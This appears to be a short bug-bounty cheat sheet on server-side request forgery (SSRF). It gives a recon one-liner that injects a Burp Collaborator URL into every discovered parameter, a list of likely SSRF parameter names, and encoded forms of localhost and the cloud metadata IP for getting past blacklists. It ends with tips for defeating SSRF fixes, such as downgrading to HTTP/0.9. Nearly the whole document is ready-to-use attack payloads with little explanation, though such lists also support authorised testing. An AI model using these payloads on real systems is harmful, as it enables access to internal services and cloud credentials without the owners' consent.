🚁My SSRF Methodology

SSRF Payload Generator

----------------------------------------------------------------

----------------------------------------------------------------

(1) One-Liner SSRFFinding

findomain -t http://testphp.vulnweb.com -q | /root/go/bin/httpx -silent -threads 1000 | /root/go/bin/gau | grep "=" | /root/go/bin/qsreplace http://YourBurpColaborator.net

----------------------------------------------------------------

TOP 10 SSRF Parameters

?dest={target}

?redirect={target}

?uri={target}

?path={target}

?continue={target}

?url={target}

?window={target}

?next={target}

?data={target}

?site={target}

----------------------------------------------------------------

SSRF Bypass list for localhost (127.0.0.1):

http://127.1/

http://0000::1:80/

http://[::]:80/

http://2130706433/

http://whitelisted@127.0.0.1

http://0x7f000001/

http://017700000001

http://0177.00.00.01

Also using a redirect to localhost will often work.

----------------------------------------------------------------

Tips Server Side Request Forgery (SSRF)

Use URLs with embedded credentials (e.g. http://user:pass@target.com) to login on internal http services when exploiting SSRF vulnerability.

----------------------------------------------------------------

Did you find the SSRF, but http://169.254.169.254/ is blacklisted? try http://0xA9FEA9FE/, http://0251.0376.0251.0376/

----------------------------------------------------------------

When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past.

----------------------------------------------------------------

Last updated